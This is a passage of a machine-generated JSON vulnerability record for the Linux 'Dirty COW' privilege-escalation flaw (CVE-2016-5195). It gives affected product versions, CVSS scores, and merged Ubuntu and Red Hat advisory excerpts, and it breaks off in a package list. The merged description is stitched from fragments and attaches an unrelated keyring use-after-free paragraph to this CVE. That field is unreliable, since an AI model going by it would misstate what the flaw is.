        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.118"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.75"
      },
      {
        "model": "linux enterprise live patching",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.15"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.44"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.70"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.72"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.87"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.81"
      },
      {
        "model": "pan-os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.17"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.92"
      },
      {
        "model": "application policy infrastructure controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.37"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.10"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "19507)0"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125007)0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.36"
      },
      {
        "model": "helion cloudsystem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.0.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.86"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.85"
      },
      {
        "model": "ar3200 v200r006c16",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.0"
      },
      {
        "model": "kernel 3.11-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.114"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "helion openstack",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.103"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.42"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.51"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.56"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.343"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.17"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.26"
      },
      {
        "model": "webex meetings server 2.5mr2",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "cloudengine v100r003c10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "6800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.42"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.7"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "52.0.2743.85"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.125"
      },
      {
        "model": "cloudengine v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "6800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.11"
      },
      {
        "model": "vrealize operations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.1"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.400"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "1.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19"
      },
      {
        "model": "kernel 3.17-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59407)0"
      },
      {
        "model": "prime service catalog virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "propel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.22"
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.92"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.14"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.52"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.18"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1180.0"
      },
      {
        "model": "prime data center network manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "cloudengine v200r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "6800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364160"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.51"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.28"
      },
      {
        "model": "mxe series media experience engines",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "35000"
      },
      {
        "model": "nexus 6p",
        "scope": null,
        "trust": 0.3,
        "vendor": "google",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.3"
      },
      {
        "model": "videoscape distribution suite video recording",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.144"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.69"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.45"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "email gateway",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.406-3402.103"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "webex meetings server mr1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5"
      },
      {
        "model": "msr4000 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)0"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5.99.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.29"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.122"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.35"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.36"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.47"
      },
      {
        "model": "helion cloudsystem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.6"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.77"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.98"
      },
      {
        "model": "visual quality experience tools server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.00"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.119"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "11.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.17"
      },
      {
        "model": "email gateway 7.6.405h1157986",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "linux enterprise software development kit sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "linux enterprise debuginfo sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "ar3200 v200r008c20",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.98"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.1"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.402"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.13"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.36"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.9"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.10"
      },
      {
        "model": "cloudengine v100r003c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "7800"
      },
      {
        "model": "(comware r3108p03",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51307)"
      },
      {
        "model": "cloudengine v200r001sph002",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "7800"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "93793"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Phil Oester.",
    "sources": [
      {
        "db": "BID",
        "id": "93793"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2016-5195",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2016-5195",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.1,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "id": "CVE-2016-5195",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2016-5195",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "id": "CVE-2016-5195",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-5195",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-5195"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5195"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \"Dirty COW.\". Linux kernel is prone to a local privilege-escalation vulnerability. \nLocal attackers may exploit this issue to gain elevated privileges. \n==========================================================================\nUbuntu Security Notice USN-3106-1\nOctober 20, 2016\n\nlinux vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n\nSummary:\n\nThe system could be made to run programs as an administrator. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n  linux-image-4.4.0-45-generic    4.4.0-45.66\n  linux-image-4.4.0-45-generic-lpae  4.4.0-45.66\n  linux-image-4.4.0-45-lowlatency  4.4.0-45.66\n  linux-image-4.4.0-45-powerpc-e500mc  4.4.0-45.66\n  linux-image-4.4.0-45-powerpc-smp  4.4.0-45.66\n  linux-image-4.4.0-45-powerpc64-emb  4.4.0-45.66\n  linux-image-4.4.0-45-powerpc64-smp  4.4.0-45.66\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 6.4) - x86_64\n\n3. (CVE-2016-5195, Important)\n\n* A flaw was found in the Linux kernel\u0027s keyring handling code: the\nkey_reject_and_link() function could be forced to free an arbitrary memory\nblock. An attacker could use this flaw to trigger a use-after-free\ncondition on the system, potentially allowing for privilege escalation. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security update\nAdvisory ID:       RHSA-2016:2105-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2016-2105.html\nIssue date:        2016-10-25\nCVE Names:         CVE-2016-5195 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. An unprivileged, local user could use this flaw to gain write\naccess to otherwise read-only memory mappings and thus increase their\nprivileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1384344 - CVE-2016-5195 kernel: mm: privilege escalation via MAP_PRIVATE COW breakage\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nkernel-2.6.32-642.6.2.el6.src.rpm\n\ni386:\nkernel-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-devel-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-642.6.2.el6.i686.rpm\nkernel-devel-2.6.32-642.6.2.el6.i686.rpm\nkernel-headers-2.6.32-642.6.2.el6.i686.rpm\nperf-2.6.32-642.6.2.el6.i686.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-642.6.2.el6.noarch.rpm\nkernel-doc-2.6.32-642.6.2.el6.noarch.rpm\nkernel-firmware-2.6.32-642.6.2.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debug-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-devel-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-devel-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-headers-2.6.32-642.6.2.el6.x86_64.rpm\nperf-2.6.32-642.6.2.el6.x86_64.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-642.6.2.el6.i686.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\npython-perf-2.6.32-642.6.2.el6.i686.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-642.6.2.el6.x86_64.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\npython-perf-2.6.32-642.6.2.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 